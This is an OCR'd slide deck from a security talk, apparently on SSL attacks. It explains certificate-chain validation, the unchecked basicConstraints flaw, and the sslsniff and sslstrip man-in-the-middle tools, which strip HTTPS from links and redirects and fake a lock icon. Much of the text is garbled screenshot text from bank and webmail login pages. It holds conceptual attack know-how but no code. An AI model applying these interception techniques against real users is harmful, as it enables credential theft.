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The Back Story 



SSL And Certificate Chaining 



[Genera! Details 



This certificate has been verified for the following uses: 

SSL Server Certificate 



Issued To 

Common Name (CN) 
Organization (O) 
Organizational Unit (OU) 
Serial Number 

Issued By 

Common Name (CN) 
Organization (0) 
Organizational Unit (OU) 

Validity 

Issued On 
Expires On 

Fingerprints 

SHA1 Fingerprint 
MD5 Fingerprint 



www.paypal.com 
PayPal, Inc. 
Information Systems 

63:4D:CE:1C:61:9F:FB:6B:26:1E:05:AD:5B:A9:85:86 

Verisign Class 3 Extended Validation SSL SGC CA 
Verisign, Inc. 
Verisign Trust Network 

05/01/2008 
05/02/2009 

A4:25:F6:7E:D2:C9:AC:D6:DE:F6:53:DA:79:5E:01:C5:17:B3:75:2D 
22:B7:78:93:7D:BA:56:8B:84:BD:F9:A9:74:70:07:00 



<9dose 



You probably know what they do... 



More specifically... 



CA Certificate 

Embedded in browser. 
All powerful. 

Certifies that a site certificate is 
authentic. 



Site 




rdephfj 

'knt)wrM6 bfe ^WferTtfcrbased 
on CA Certificate's signature. 



CA Certificate 

Embedded in browser. 
All powerful. 

Certifies that an intermediate 
CA is authentic. 



ntermediate 

lo^ribedded in browser, 
filfsort of all-powerful. 
Certifies that a site certificate is 
authentic. 



on ( 



Certificate's signature. 



Certificate Chains Can Be > 3 




How do we validate these things? 



Almost everyone tells you the 

same story. 



What they say 



Verify that the leaf node has the name of the site 
you're connecting to. 

Verify that the leaf node hasn't expired. 

Check the signature. 

If the signing certificate is in our list of root CA's, 
stop. 

Otherwise, move one up the chain and repeat. 



Here Be Dragons 








Very tempting to use a 
simple recursive 
function. 

Everyone focuses on the 
signature validation. 

The result of a naive 
attempt at validation is 
a chain that is complete, 
but nothing more. 



What they say 



Verify that the leaf node has the name of the site 
you're connecting to. 

Verify that the leaf node hasn't expired. 

Check the signature. 

If the signing certificate is in our list of root CA's, 
stop. 

Otherwise, move one up the chain and repeat. 



Something must be wrong, but 



All the signatures are valid. 
Nothing has expired. 
The chain is in tact. 

The root CA is embedded in the browser and 
trusted. 



But we just created a valid 
rtificate for PayPal, and we're 

PayPal? 



not 



The missing piece... 



is a somewhat obscure field 



File Edit View Terminal Tabs Help 



moxie@searching: ~/Desktop/b. 



moxie@searching: ~/Desktop/b... X moxie@searching: ~/Desktop/b... 



f8:c9:0f : 24: d2:c7:c2 :92:0c : 13: 54:93 :d5 :9b: c7: 
0e:fa:19:a8:d5:d3:f7:ab:5d 
Exponent: 65537 (0x16001) 
X509v3 extensions: 

X509v3 Key Usage: critical 

Digital Signature, Non Repudiation, Key Encipherment , Data Encip 

herment 

X509v3 Subject Key Identifier: 

DF:48:EF:25:BF:D2:23:B0:F0:C2:AC:FA:5A:85:50:74:FF:F9:34:EF 
X509v3 CRL Distribution Points: 

URI :http ://c rl .geot rust .com/c rls/globalcal .c rl 

X509v3 Authority Key Identifier: 

keyid:BE:A8:A0:74:72:50:6B:44:B7:C9:23:D8:FB:A8:FF:B3:57:6B:68:6 

C 



X509v3 Extended Key Usage: 

TLS Web Server Authentication, TLS Web Client Authentication 
^^^►^ X509v3 Basic Constraints: critical 
CA: FALSE 

Signature Algorithm: shalWithRSAEnc ryption 

7a:58:f9:88:14:cb:77:32:aa:83:12:de:d9:15:74:8e:34:e3: 
66:ca:bc :24:2c :28: 96:54 :cd: be :51 : 56:60 :87:e3:be:c6 :2e: 
86:7e:74:cl :68:01 :b6:8c :07:c6:a2:0c :a4:36:ca:el :a8:e9: 



Back In The Day 



Most CA's didn't explicitly set basicConstraints: 
CA= FALSE 

A lot of web browsers and other SSL 
implementations didn't bother to check it, whether 
the field was there or not. 

Anyone with a valid leaf node certificate could 
create and sign a leaf node certificate for any 
other domain. 

When presented with the complete chain, IE, 
Konqueror, OpenSSL, and others considered it 
valid. 



And then in 2002 



Microsoft did something particularly annoying, and 
I blew this up by publishing it. 

Microsoft claimed that it was impossible to exploit. 

So I also published a tool that exploits it. 



sslsniff 




sslsniff 




\ 



Client Side: 

Intercepts HTTPS traffic. 
Generates a certificate for the 
site the client is connecting 
to. 

Signs that with whatever 
certificate you specify. 
Proxies data through. 




Server Side: 

Makes normal HTTPS 
connection to the server. 
Sends and receives data 
as if it's a normal client. 



sslsniff 




Back before people started checking BasicConstraints: 

All you had to do was pass sslsniff a valid leaf node certificate for any domain. 

It would automatically generate a certificate for the domain the client was connecting to 

on the fly. 

It would sign that certificate with the leaf node. 
IE, Konqueror, etc... wouldn't notice the difference. 



sslsniff post-disclosure 



You'd be surprised who still doesn't check basic 
constraints. 

Even when people got warning dialogs in browsers 
that had been fixed, most of the time they'd just 
click through them. 

Still useful as a general MITM tool for SSL. 

The folks who did the MD5 hash collision stuff 
used sslsniff to hijack connections once they'd 
gotten a CA cert. 

There are other uses yet, to be disclosed another 
day. 



Surely we can do better. 



The things you learn in TV studios 



File Edit View History Bookmarks Tools Help 



QOI 



http://www.bankofamerica.com/index.jsp 



| (G]^ . ' ogle 



^Most Visited ▼ 



Bank of America 



Locations • Contact Us • Help • Sign In • En Espanol 



personal - 



SMALL BUSINESS ► 



Search 



CORPORATE & INSTITUTIONAL ► ] ABOUT BANK OF AMERICA > 



Online Banking 



Easy. Secure. Free. 

i. iii ■ View demo | 
13111811 Learn more 

Enter Online ID: 



□ Save this Online ID 
Password: 



Where do I enter my 
Passcode? 



Sign In 



You've served our country. 
Now it's our privilege to serve you 

Military Banking accounts from Bank of America. 



Convenient, secure banking yrfierever you are. 
Military Banking from Bank of America. 



Get started today 




Products & Services Manage Your Accounts Achieve Your Goals 



Forgot or need help with your ID? 
Reset Passcode 



You Privacy & Secirity 

Report suspicious email 
Norton 360 - Free Trial 



Checking 
Savings fi CDs 
Credit cards 
Mortgage 
Refinance 
Home equity 
Auto loans 
IRAs 

Investment Services 



Fees and processes 
Order Check Card 
Online Investing 

Online Banking > 

Viewing your accounts 
Accessing credit cards 
Bill Pay 

Tracking your expenses 



Keep the Change® 
Buying a home 
Searching for a home 
Retirement Center 
Planning for college 
Student loans 
Purchasing a car 
Consolidating debt 
Small Business Online 



2] 



J 



X Find: 



^■Previous ^Next Highlight all □ Match case 



Done 



The things you learn in TV studios 



File Edit View History Bookmarks Tools Help 



l_j | http://wwiA/.bankofamerica.com/index.jsp 



Googl 



^Most Visited ▼ 



Bank of America 



Locations • Contact Us • Help • Sign In • En Espariol 



Search 



personal • 



SMA ' . BUSINESS » 



CORPORATE & INSTITUTIONAL ► i ABOUT BANK OF AMERICA ► 



On/rs Banking 



Easy. Secure. Free. 

|smm View demo | 
liilllill Learn more 



Enter Online ID: 



You've served our country. 

Now it's our privilege to serve you. 

Military Banking accounts from Bank of America. 



□ Save this Online ID 
Password: 



Where do I enter my 
Passcode? 



Sign In 



Convenient, secure banking wherever you are. 
Military Banking tram Bank of America. 



Get started today 



J 




Products & Services Manage Your Accounts Achieve Your Goals 



Forgot or need help with your ID? 
Reset Passcode 



Yoir Privacy & Seen ity 

Peport suspicious email 
Norton 360 - Free Trial 



Checking 
Savings & CDs 
Credit cards 
Mortgage 
Refinance 
Home equity 
Auto loans 
IRAs 

Investment Services 



Fees and processes 
Order Check Card 
Online Investing 

Online Banking > 

Viewing your accounts 
Accessing credit cards 
Bill Pay 

Tracking your expenses 



Keep the Change® 
Buying a home 
Searching for a home 
Retirement Center 
Planning for college 
Student loans 
Purchasing a car 
Consolidating debt 
Small Business Online 



J 



Find: 



4" Previous ■►Next Highlight all □ Match case 



Done 



The things you learn in TV studios 



File Edit View History Bookmarks Tools Help 
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1 1[ I http://www.bankofamerica.com/index.jsp 



Gl^ Google 



^Most Visited ▼ 



Bank of America 



Locations • Contact Us • Help • Sign In • En Espariol 



Search 



personal • 



SMALL BUSINESS » 



CORPORATE & INSTITUTIONAL ► i ABOUT BANK OF AMERICA ► 



Online Banking 



Easy. Secure. Free. 

|smm View demo | 
liilllill Learn more 



Enter Online ID: 



You've served our country. 

Now it's our privilege to serve you. 

Military Banking accounts from Bank of America. 



□ Save this Online ID 
Password: 



Where do I enter my 
Passcode? 



Sign In 



Convenient, secure banking wherever you are. 
Military Banking tram Bank of America. 



Get started today 



J 




Products & Services Manage Your Accounts Achieve Your Goals 



Forgot or need help with your ID? 
Reset Passcode 



Yoir Privacy & Secirity 

Peport suspicious email 
Norton 360 - Free Trial 



Checking 
Savings & CDs 
Credit cards 
Mortgage 
Refinance 
Home equity 
Auto loans 
IRAs 

Investment Services 



Fees and processes 
Order Check Card 
Online Investing 

Online Banking > 

Viewing your accounts 
Accessing credit cards 
Bill Pay 

Tracking your expenses 



Keep the Change® 
Buying a home 
Searching for a home 
Retirement Center 
Planning for college 
Student loans 
Purchasing a car 
Consolidating debt 
Small Business Online 



J 



Find: 



4" Previous ■►Next Highlight all □ Match case 



Done 



The things 




you learn in TV studios 



This button posts to an HTTPS link, but there's no way to 
know that. 

It's a button, so if you mouse-over it, the link isn't displayed 
in the browser bar at the bottom. 

The best you could do would be to view the page source, 
but that's problematic in browsers like Firefox that issue a 
second request to the server for the source. 



Still prevalent today... 



File Edit View History Bookmarks Tools Help 



^ ▼ 0 ^ ^ http://www.wachovia.com/ 


▼ 




1^3 Most Visited'*' ^Getting Started 1 'Latest Headlines ^ 



Customer Service Contact Us i Locations 




Login 



User ID: 



Remember my User ID 

Password: 

I 

(case sensitive) 
Service: 
Choose a service.. . ▼ | 



Login 



Forgot User ID or Password? 

Retirement Plan Participants: Login 
Education Loan Customers: Login 

Online Secirity 

Wachovia Security Plus SM 
Online Services Guarantee 



Sign Up for Online Banking 

Sign Up Learn More Demo 



Locations 



ZIP: 



More Search Options 



Personal Finance 

Online Services 

Online Banking with BillPay 
Mobile Banking 
Online Brokerage 

More... 

Retirement Planning 

Tools & information for 
Lifetime Retirement Planning 

Investing 

Accounts & Services 
IRAs 

More... 

Insirance 

Life, Auto, Home, 
Health 



Refer a Friend 

It adds up to $25 for both 
of you. 



See How 03 



The time is now. 

Mortgage rates are at an all -time low. 

Refinance today and save. 



Learn Hzw > 



► En espariol 



Banking 

Checking 
Savings & CDs 
Credit Cards 
Check Cards 
More... 

Lending 

Mortgage 

Home Equity New! 
Education Loans 
Vehicle Loans 

Rates 

Mortgage Rates 
Home Equity Rates 
Credit Card Pates 

Payment Challenges? 

Explore your loan options 

Ready to get organized? 

It's easier than you thinlc 



Go Paperless Q3 









1 


| Search 




Search Tips 



STRENGTH AND STABILITY 



Wachovia is now 

part of Wells Fargo. 

Leam More Eu 



Wachovia Securities 

An industry leader in investment and 
advisory services for individuals, 
corporations and institutions. 



Small Business 

The tools, services, and research to 
manage your company. 
Small Business Login 

ONLINE BANKING. 

Securely manage your business 
finances online. 
Wachovia Business Online. 



Done 



Still prevalent today... 



* + - 8 o A 


' http://login. live. com/login. srf?wa=wsigninl.O&rf 


▼ 


[Qh | Google 


(§3 Most Visited"' Getting Started Latest Headlines ▼ 



Windows Live 



One Windows Live ID gets you into Hotmail. Messenger. Xbox LIVE — and other places you see £ 



Hotmail 

Hi Powerful Microsofttechnology 
helps fight spam and improve 
security. 

5 Get more done thanks to greater 
ease and speed. 

£5 Lots of storage (5 GB) - more cool 
stuff on the way. 

Learn more 
Don't have a Windows Live ID? 



sign up 



Sign in 



$ Windows Live ID: |~ 



(example555@hotmail.com) 



Password: 



Forg ot your password? 

[7] Remember me on this 

computer (?) 
I I Remember my password (?) 



Sign in 



Use enhanced security 



Done 



There are some generalizable attacks 

here. 



Browsers Then And Now... 



Then: A Positive Feedback System 



A number of indicators deployed to designate that 
a page is secure. 

A proliferation of little lock icons. 

URL bars that turn gold. 



Then: An example from Firefox 2 



File Edit View History Bookmarks lools Help 



\m https://login, yahoo, com/config/mail?,intl=us6 fjj ▼ [CI" Google 



I MAIL 



Chat right from 
your Inbox. 



» See how 



Your Inbox understands you've got news to share. 




wijA See which of your contacts are online at a glance. 



Easily switch from email to chat and back again. 



' w * Start right away, no download or setup needed. 



>ee how to instantly reach friends and family from the New Yahoo! Mail. 



Yahoo!- Blog- Help P 



Sign in to Yahoo! 



Are you protected? 

Create your sign-in seal. 
(Why?) 



Yahoo! ID: 



(e.g. free2rhyme@yahoo.com) 



Password: 



I - Keep me signed in 



Info 



for 2 weeks unless I sign out. 
[Uncheck if on a shared computer] 

Sign In 

Forget your ID or password? | Help 

Don't have a Yahoo! ID? 

Signing up is easy. 

Sign Up 



Done 



login.yahoo.com £) Tor Disabled FoxyProxy: Disable 



Then: An example from Firefox 2 



Zt!t jTff https://login, yahoo, com/config/mail?,intl=us6 Saj^l ►] |lGl T Google 



I MAIL 



Chat right from 
your Inbox. 



» See how 



Your Inbox understands you've got news to share. 




wijA See which of your contacts are online at a glance. 



Easily switch from email to chat and back again. 



' w * Start right away, no download or setup needed. 



>ee how to instantly reach friends and family from the New Yahoo! Mail. 



Yahoo!- Blog- Help P 



Sign in to Yahoo! 



Are you protected? 

Create your sign-in seal. 
(Why?) 



Yahoo! ID: 



(e.g. free2rhyme@yahoo.com) 



Password: 



I - Keep me signed in 



Info 



for 2 weeks unless I sign out. 
[Uncheck if on a shared computer] 

Sign In 

Forget your ID or password? | Help 

Don't have a Yahoo! ID? 

Signing up is easy. 

Sign Up 



Done 



login.yahoo.com £) Tor Disabled FoxyProxy: Disable 



Then: An example from Firefox 2 



File Edit View History Bookmarks lools Help 
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https://www.riseup.net 


▼ 




G ' 


Google 




» 




riseup.net pro 
alternatives ar 



mail.r 



We pre 
access 
mail. L 



hostir 



Riseup 
that w< 
some r. 



help.r 



■|aiB»5M«IHi«r a ... W .i.wi.i: < .i.ivi.«i.ii.i.iiik 

Unable to verify the identity of admin.riseup.net as a trusted site. 
Possible reasons for this error: 

- Your browser does not recognize the Certificate Authority that issued the site's 
certificate. 

- The site's certificate is incomplete due to a server misconfiguration. 

- You are connected to a site pretending to be admin.riseup.net, possibly to 
obtain your confidential information. 

Please notify the site's webmaster about this problem. 

Before accepting this certificate, you should examine this site's certificate 
carefully. Are you willing to to accept this certificate for the purpose of identifying 
the Web site admin.riseup.net? 

Examine Certificate. 



O Accept this certificate permanently 

0 Accept this certificate temporarily for this session 

O Do not accept this certificate and do not connect to this Web site 



Cancel 



OK 



jmocratic 



Our ex 

security , SSL certificates , mail client tutorials , viruses , and spam . Or, if you don't find what you are looking for, fill 
out a help ticket , and we will get back to you as soon as we are able. 



about us 



Connected to www.riseup.net... 



Tor Disabled FoxyProxy: Disablec 



Then: An example from Firefox 2 



File Edit View History Bookmarks lools Help 
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https://www.riseup.net 


▼ 




G ' 


Google 




» 




riseup.net pro 
alternatives ar 



mail.r 



We pre 
access 
mail. L 



hostir 



Riseup 
that w< 
some f 



help.r 



■|aiB»5M«IHi«r a ... W .i.wi.i: < .i.ivi.«i.ii.i.iiik 

Unable to verify the identity of admin.riseup.net as a trusted site. 
Possible reasons for this error: 

- Your browser does not recognize the Certificate Authority that issued the site's 
certificate. 

- The site's certificate is incomplete due to a server misconfiguration. 

- You are connected to a site pretending to be admin.riseup.net, possibly to 
obtain your confidential information. 

Please notify the site's webmaster about this problem. 

Before accepting this certificate, you should examine this site's certificate 
carefully. Are you willing to to accept this certificate for the purpose of identifying 
the Web site admin.riseup.net? 

Examine Certificate. 



O Accept this certificate permanently 

0 Accept this certificate temporarily for this session 

O Do not accept this certificate and do not connect to this Web site 



Cancel 



OK 



jmocratic 



Our ex 

security , SSL certificates , mail client tutorials , viruses , and spam . Or, if you don't find what you are looking for, fill 
out a help ticket , and we will get back to you as soon as we are able. 



about us 



Connected to www.riseup.net... 



Tor Disabled FoxyProxy: Disablec 



Now: A Negative Feedback System 



Less emphasis on sites being secure. 

The proliferation of little locks has been toned 
down. 

Firefox's gold bar is gone. 

More emphasis on alerting users to problems. 

A maze of hoops that users have to jump through 
in order to access sites with certificates that aren't 
signed by a CA. 



Now: An example from Firefox 3 



File Edit View History Bookmarks Tools Help 



| V https://login. yahoo. com/config/login_verify2?&.src=ym w | [iGl^ | 1 



Most Visited - ' Getting Started M Latest Headlines' 



f MAIL 



Chat right from 
your Inbox. 



» See how 



Your Inbox understands you've got news to share. 




See which of your contacts are online at a glance. 



Easily switch from email to chat and back again. 



Start right away, no download or setup needed. 



See how to instantly reach friends and family from the New Yahoo! Mail. 



Yahoo! - Help 



Don't have a 

Yahoo! ID? 

Signing up is easy. 



Sign up for Yahoo! 



Already have a Yahoo! ID? 

Sign in. 



Are you protected? 

Create your sign-in seal. 

(Why?) 



Yahoo! ID: 



(e.g. fiee2rhyme@yahoo.com) 

Password: 



□ Keep me signed in 



Info 



for 2 weeks unless I sign out. 
[Uncheck if on a shared computer] 



Sign In 



Done 



login.yahoo.com 



Now: An example from Firefox 3 



File Edit View History Bookmarks Tools Help 



| Tr? https://login. yahoo. com/config/login_verify2?&.src=ym w | [ICl^ | 1 



Most Visited - ' ^Getting Started^! Latest Headlines' 



f MAIL 



Chat right from 
your Inbox. 



» See how 



Your Inbox understands you've got news to share. 




See which of your contacts are online at a glance. 



Easily switch from email to chat and back again. 



Start right away, no download or setup needed. 



See how to instantly reach friends and family from the New Yahoo! Mail. 



Yahoo! - Help 



Don't have a 

Yahoo! ID? 

Signing up is easy. 



Sign up for Yahoo! 



Already have a Yahoo! ID? 

Sign in. 



Are you protected? 

Create your sign-in seal. 

(Why?) 



Yahoo! ID: 



(e.g. fiee2rhyme@yahoo.com) 

Password: 



□ Keep me signed in 



Info 



for 2 weeks unless I sign out. 
[Uncheck if on a shared computer] 



Sign In 



Done 



login.yahoo.com 



Now: An example from Firefox 3 



File Edit View History Bookmarks Tools Help 



| "V? https://login.yahoo.com/config/login_verify2?&.src=ym w | [iGl^ | 1 



Most Visited - ' ^Getting Started^! Latest Headlines' 



f MAIL 



Chat right from 
your Inbox. 



» See how 



Your Inbox understands you've got news to share. 




See which of your contacts are online at a glance. 



Easily switch from email to chat and back again. 



Start right away, no download or setup needed. 



See how to instantly reach friends and family from the New Yahoo! Mail. 



Yahoo! - Help 



Don't have a 

Yahoo! ID? 

Signing up is easy. 



Sign up for Yahoo! 



Already have a Yahoo! ID? 

Sign in. 



Are you protected? 

Create your sign-in seal. 

(Why?) 



Yahoo! ID: 



(e.g. fiee2rhyme@yahoo.com) 

Password: 



□ Keep me signed in 



Info 



for 2 weeks unless I sign out. 
[Uncheck if on a shared computer] 



Sign In 



Done 



login.yahoo.com 



Now: An example from Firefox 3 



File Edit View History Bookmarks Tools Help 



| "V? https://login.yahoo.com/config/login_verify2?&.src=ym w | [iGl^ | 1 
33 Most Visited'*' ^Getting Started^_| Latest Headlines' 

I MAIL 



Chat right from 
your Inbox. 



» See how 



Your Inbox understands you've got news to share. 




See which of your contacts are online at a glance. 



Easily switch from email to chat and back again. 



Start right away, no download or setup needed. 



See how to instantly reach friends and family from the New Yahoo! Mail. 



Done 



Don't have a 

Yahoo! ID? 

Signing up is easy. 



Sign up for Yahoo 



Already have a Yahoo! ID? 

Sign in. 



Are you protected? 

Create your sign-in seal 

(Why?) 



Yahoo! ID: 



(e.g. fiee2rhyme@yahoo.com) 

Password: 



□ Keep me signed in 

for 2 weeks unless I sign out 
[Uncheck if on a shared computer] 




Sign In 



login.yahoo.com 



Now: An example from Firefox 3 



File Edit View 


History Bookmarks Tools Help 
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f 

Secure Connection Failed 

wvwv.riseup.net uses an invalid security certificate. 

The certificate is not trusted because the issuer certificate is unknown. 
The certificate is only valid for admin.riseup.net 

(Error code: sec error unknown issuer) 




■ This could be a problem with the server's configuration, or it could be 
someone trying to impersonate the server. 

■ If you have connected to this server successfully in the past, the error 
may be temporary, and you can try again later. 

Or you can add an exception... 



Done 



Now: An example from IE 



ificate Error: Navigation Blocked - Windows Internet Explorer 



^^v^m ^ jBj https://www.riseup.net 



^ Certificate Error: Navigation Blocked 



* Page » Q Tools 



There is a problem with this website's security certificate. 



The security certificate presented by this website was not issued by a trusted certificate 
authority. 

The security certificate presented by this website was issued for a different website's address. 

Security certificate problems may indicate an attempt to fool you or intercept any data you 
send to the server. 



We recommend that you close this webpage and do not continue to this website. 

® Click here to close this webpage. 

9 Continue to this website (not recommended). 

© More information 



Conclusions 



If we trigger the negative feedback, we're 
screwed. 

If we fail to trigger the positive feedback, it's not 
so bad. 



How is SSL used? 



Nobody types https:// 
(or http:// for that matter) 



People generally encounter SSL 

in only two ways: 

Clicking on links. 
Through 302's. 



Which means that people only 
encounter SSL through HTTP... 



First cut: A different kind of MITM 




the 





First cut: A different kind of MITM 




Remember: 

SSL is normally encountered in one of two ways 

By clicking on links. 
Through 302 redirects. 



We can attack both of those points through a 
HTTP MITM. 



A First Cut Recipe: sslstrip 




A First Cut Recipe: sslstrip 




A First Cut Recipe: sslstrip 




How does it look? 



Secure Site 



File Edit View 


History Bookmarks Tools Help 
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Welcome to Gmail 



BETA 




A Google approach to email. 

Gmail is a new kind of webmail, built on the idea that email can be more intuitive, 
efficient, and useful. And maybe even fun. After all, Gmail has: 



Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
b rows e r to http :// g m ai I . co ml ap p Learn more 

Lots of space 

Over 7290.461681 megabytes (and counting) of free storage so 
you'll never need to delete another message. 



Sign in to Gmail with your 

Google Account 

UsernameT 



Password P 

f~J Remember me on this 
computer. 

Sign in | 
I cannot access my account 



Sign up for Gmail 

About Gmail New features! 
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efficient, and useful. And maybe even fun. After all, Gmail has: 



Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
browser to http://gmail.com/app Learn more 

Lots of space 

Over 7290.462157 megabytes (and counting) of free storage so 
you'll never need to delete another message. 



Sign in to Gmail with your 
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Username: 
Password: 



□ Remember me on this 
computer. 
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A Google approach to email. 

Gmail is a new kind of webmail. built on the idea that email can be more intuitive, efficient, and useful. And maybe even 
fun. After all. Gmail has: 

Less spam 

Keep unwanted messages out of your inbox with Google's innovative technology. 



Mobile access 

Read Gmail on your mobile phone by pointing your phone's web browser to http://gmail.com/app. 

Learn more 

Lots of space 

Over 7295.652889 megabytes (and counting) of free storage so you'll never need to delete another 
message. 



Sign in to Gmail with your 

Google Account 

Username: | 

Password: 

□ Remember me on this 
computer. 

( Sign in ) 
I cannot access my account 
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About Gmail New features! 
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A Google approach to email. 

Gmail is a new kind of webmail. built on the idea that email can be more intuitive, efficient, and useful. And maybe even 
fun. After all. Gmail has: 

^<~\ Less spam 

Keep unwanted messages out of your inbox with Google's innovative technology. 



Mobile access 

Read Gmail on your mobile phone by pointing your phone's web browser to http://gmail.com/app. 

Learn more 

Lots of space 

Over 7295.653389 megabytes (and counting) of free storage so you'll never need to delete another 
message. 



Sign in to Gmail with your 

Go gle Account 



Username: 
Password: 



□ Remember me on this 
computer. 

Sign in 

I cannot access my account 



Sign up for Gmail 

About Gmail New features! 
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What else can we do? 



We've managed to avoid the negative feedback, 
but some positive feedback would be good too. 

People seem to like the little lock icon thing, so it'd 
be nice if we could get that in there too. 



A 1.5 Cut: sslstrip 




What should our favicon be? 

You guessed it: 




Once again, a secure site 
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Lots of space 

Over 7290.461681 megabytes (and counting) of free storage so 
you'll never need to delete another message. 
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A Google approach to email. 

Gmail is a new kind of webmail, built on the idea that email can be more intuitive, 
efficient, and useful. And maybe even fun. After all, Gmail has: 



Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
browser to http://gmail.com/app Learn more 

Lots of space 

Over 7290 .462157 megabytes (and counting) of free storage so 
you'll never need to delete another message. 
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Password: 



□ Remember me on this 
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Sign in | 
I cannot access my account 
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Done 



We're doing pretty good. 



We've avoided the negative feedback of 
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H = Secure Connection Failed 

BBS wvwv.riseup.net uses an invalid security certificate. 

The certificate is not trusted because the issuer certificate is unknown. 
The certificate is only valid for admin.riseup.net 

(Error code: sec error unknown issuer) 



■ This could be a problem with the server's configuration, or it could be 
someone trying to impersonate the server. 

■ If you have connected to this server successfully in the past, the error 
may be temporary, and you can try again later. 

Or you can add an exception... 

\ ) 



Done 



We can do a subtle MITM via HTTP. 
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A Google approach to email. 

Gmail is a new kind of webmail, built on the idea that email can be more intuitive, 
efficient, and useful. And maybe even fun. After all, Gmail has: 



Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
browser to http://gmail.com/app. Learn more 

Lots of space 

Over 7290 .462157 megabytes (and counting) of free storage so 
you'll never need to delete another message. 
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Sign in to Gmail with your 

Google Account 

Username:P 
Password :j 

□ Remember me on this 
computer. 

Sign in | 
I cannot access my account 

Sign up for Gmail 

About Gmail New features! 
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Done 



And if we want we can throw in a little lock 
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A Google approach to email. 

Gmail is a new kind of webmail, built on the idea that email can be more intuitive, 
efficient, and useful. And maybe even fun. After all, Gmail has: 



Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
browser to http://gmail.com/app Learn more 

Lots of space 

Over 7290 .462157 megabytes (and counting) of free storage so 
you'll never need to delete another message. 
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Password: 
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I cannot access my account 
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Done 
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Login 



User ID: 



Remember my User ID 

Password: 

I 

(case sensitive) 
Service: 
Choose a service.. . ▼ | 



Login 



Forgot User ID or Password? 

Retirement Plan Participants: Login 
Education Loan Customers: Login 

Online Secirity 

Wachovia Security Plus SM 
Online Services Guarantee 



Sign Up for Online Banking 

Sign Up Learn More Demo 



Locations 



ZIP: 



More Search Options 



Personal Finance 

Online Services 

Online Banking with BillPay 
Mobile Banking 
Online Brokerage 

More... 

Retirement Planning 

Tools & information for 
Lifetime Retirement Planning 

Investing 

Accounts & Services 
IRAs 

More... 

Insirance 

Life, Auto, Home, 
Health 



Refer a Friend 

It adds up to $25 for both 
of you. 



See How 03 



The time is now. 

Mortgage rates are at an all -time low. 

Refinance today and save. 



Learn Hzw > 



► En espariol 



Banking 

Checking 
Savings & CDs 
Credit Cards 
Check Cards 
More... 

Lending 

Mortgage 

Home Equity New! 
Education Loans 
Vehicle Loans 

Rates 

Mortgage Rates 
Home Equity Rates 
Credit Card Pates 

Payment Challenges? 

Explore your loan options 

Ready to get organized? 

It's easier than you thinlc 



Go Paperless Q3 
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Search Tips 



STRENGTH AND STABILITY 



Wachovia is now 

part of Wells Fargo. 

Leam More Eu 



Wachovia Securities 

An industry leader in investment and 
advisory services for individuals, 
corporations and institutions. 



Small Business 

The tools, services, and research to 
manage your company. 
Small Business Login 

ONLINE BANKING. 

Securely manage your business 
finances online. 
Wachovia Business Online. 
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Login 



User ID: 



□ Remember my User ID 

Password: 

I 

(case sensitive) 
Service: 

Choose a service... [▼ 



Login 



Forgot User ID or Password ? 

Retirement Plan Participants: Login 
Education Loan Customers: Login 

Online Secirity 

Wachovia Security Plus SM 
Online Services Guarantee 



Sign Up for Online Banking 

Sign Up Learn More Demo 



Locations 



ZIP: 



More Search Options 
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Online Services 

Online Banking with BillPay 
Mobile Banking 
Online Brokerage 

More... 

Retirement Planning 

Tools 8 information for 
Lifetime Retirement Planning 

Investing 

Accounts & Services 
IRAs 

More... 

Insiraiice 

Life, Auto, Home, 
Health 



Refer a Friend 

It adds up to $25 for both 
of you. 

See How 03 



The time is now. 

Mortgage rates are at an all time low. 

Refinance today and save. 



► En espanol 

Banking 

Checking 
Savings & CDs 
Credit Cards 
Check Cards 
More... 

Lending 

Mortgage 

Home Equity New! 
Education Loans 
Vehicle Loans 

Rates 

Mortgage Rates 
Home Equity Rates 
Credit Card Rates 

Payment Challenges? 

Explore your loan options 

Ready to get organized? 

It's easier than you think 

Go Paperless 03 



Search 



Search Tips 



STRENGTH AND STABILITY 



Wachovia is now 
part of Wells Fargo. 

Learn More d 



Wachovia Securities 

An industry leader in investment and 
advisory services for individuals, 
corporations and institutions. 



Small Business 

The tools, services, and research to 
manage your company. 
Small Business Login 

ONLINE BANKING. 

Securely manage your business 
finances online. 
Wachovia Business Online. 



Done 



The sites themselves confuse us 
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PayPal 



U.S. English 



Personal | Business | Products ft Services | Developers 



Home 

GetStarted Send Money RequestMoney Sell on eBay Developers 



\ccoint login Q 

Email address 




PayPal password 



Log In I 

Forgot your email address or 
password? 

New to PayPal? Sign up . 



Top questions 

+ Why use PayPal when I 
have credit cards"' 

+ What can I do with 
PayPal? 

-» Is PayPal free to use? 



Limitless love? 
Limited budget? 

We've got you covered. 





Save 15% at l-800-flowersfcom 

plus new customers get a $20 Savings Pass 



Terms 



Pay online 



Pay With: VISA E 
Get paid online 







BANK 



:■ Learn how PayPal works. 

> Shop without exposing your financial 
information. 

> Send money to friends and family around 



> Accept payments for your eBay listings. 

> Start accepting credit cards on your 
website. 

:■ See all the ways to get paid online. 



Done 



The sites themselves confuse us 
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Personal | Business | Products & Services | Developers 



Home 

Get Started Send Money Request Money Sell on eBay Developers 
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Email address 




PayPal password 



Log In | 

Forgot your email address or 
password ? 



New to PayPal? Sign up 

Top questions 

■» Why use PayPal when 
have credit cards? 

* What can I do with 
PayPal? 

-» Is PayPal free to use? 



Limitless love? 
Limited budget? 

We've got you covered. 





Save 15% at l-800-f lowers^ com 

plus new customers get a $20 Savings Pass 



Pay online 



Pay With: VISA E 
Get paid online 







BANK 







> Learn how PayPal works. 

> Shop without exposing yourfinancial 
information. 

> Send money to friends and family around 



> Accept payments for your eBay listings. 

> Start accepting credit cards on your 
website. 

> See all the ways to get paid online. 



Done 



A Few Gotchas 



Content encodings that are difficult to parse 
(compress, gzip, etc..) 

Secure cookies won't get sent over HTTP that's 
been stripped of SSL. 

Cached pages that don't give us a chance to swap 
out their links. 



A Few Gotchas 



Content encodings that are difficult to parse 
(compress, gzip, etc..) 

Secure cookies won't get sent over HTTP that's 
been stripped of SSL. 

Cached pages that don't give us a chance to swap 
